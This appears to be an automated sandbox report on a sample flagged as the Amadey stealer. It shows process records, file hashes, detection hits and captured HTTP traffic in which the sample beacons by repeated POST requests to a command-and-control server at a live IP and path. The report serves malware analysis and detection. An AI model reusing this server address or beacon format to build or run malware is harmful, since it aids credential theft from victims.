Jul 26, 2024 21:00:40.467555046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 21:00:40.467659950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 21:00:40.468456030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.6	51175	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:40.588011980 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:41.662581921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.6	51176	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:41.672707081 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:42.550302982 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.6	51177	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:42.668124914 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:43.425728083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.6	51178	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:43.434999943 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.6	51179	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:44.279313087 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:45.053205013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.6	51180	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:45.061975002 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:45.833709955 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.6	51181	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:45.946856022 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:47.451484919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:00:47.452342033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:00:47.452452898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.6	51182	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:47.460967064 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:48.437192917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.6	51183	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:48.556248903 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:49.359194040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.6	51184	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:49.371691942 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:50.211755037 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.6	51185	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:50.327857018 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:51.134630919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.6	51186	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:51.145494938 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:51.908798933 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.6	51187	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:52.024971008 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:52.828098059 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.6	51188	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:52.838639975 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:53.604022980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.6	51189	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:53.728637934 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:54.485096931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.6	51190	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:54.498294115 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:55.251640081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.6	51191	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:55.369916916 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:56.157407045 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Target ID:	0
Start time:	14:58:50
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\setup.exe"
Imagebase:	0x190000
File size:	1'933'312 bytes
MD5 hash:	2A846C38FB95E0103773296F7E7794EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2128912313.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2088563271.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:58:52
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x500000
File size:	1'933'312 bytes
MD5 hash:	2A846C38FB95E0103773296F7E7794EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2157568519.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2116812942.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:58:54
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x500000
File size:	1'933'312 bytes
MD5 hash:	2A846C38FB95E0103773296F7E7794EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2126010864.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2166411163.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:59:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x500000
File size:	1'933'312 bytes
MD5 hash:	2A846C38FB95E0103773296F7E7794EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.2188818191.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 04F600B8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76c77647bd405c6d15db61ae1f5a84a91f1d973d27a4867fa7e3c97be34f796
Instruction ID: 9c0df2ff82636eba11a8c6bbece17091e60c78d45624f9483c418a15785c0cfb
Opcode Fuzzy Hash: d76c77647bd405c6d15db61ae1f5a84a91f1d973d27a4867fa7e3c97be34f796
Instruction Fuzzy Hash: AA0147E738C111FE2253CD810B18AFB252EE7D63303308015B807DA602FE846A473971

Function 04F600C1 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b774fddb685002c0009e19eff7fe0d55ee4be0f372f9d2c7428dc8603667291
Instruction ID: 1b57d00b5fc5805beb1eee00c633d5ac4b8fb1c9e1dfddf63d7798b747f24963
Opcode Fuzzy Hash: 1b774fddb685002c0009e19eff7fe0d55ee4be0f372f9d2c7428dc8603667291
Instruction Fuzzy Hash: B9117AA774C156FEA343CE901A55AF63B29EB473307304465F443CB902FE847A4B7A21

Function 04F60104 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5877c33e4f3ae37d586adda15367fa8bd9389ca30e486123fd28cf692cb799af
Instruction ID: 6faccba528eb7fad0409aeb9ff58a81c8b3f2aca3dcd4262ca4672f91227a2c5
Opcode Fuzzy Hash: 5877c33e4f3ae37d586adda15367fa8bd9389ca30e486123fd28cf692cb799af
Instruction Fuzzy Hash: 2501F5A725C205FEA352CE864B08BF77629EB97330B304425F5439A602FA946B477D71

Function 04F600D7 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131224162.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f60000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bdaf0a5c8efc8e50449ef8d0566c520ed47093953ed7999795eb142433b444e
Instruction ID: fad4d0efb16a34e4b98249d1e8cea06018b140aef59a971960d4e339f2d47928
Opcode Fuzzy Hash: 0bdaf0a5c8efc8e50449ef8d0566c520ed47093953ed7999795eb142433b444e
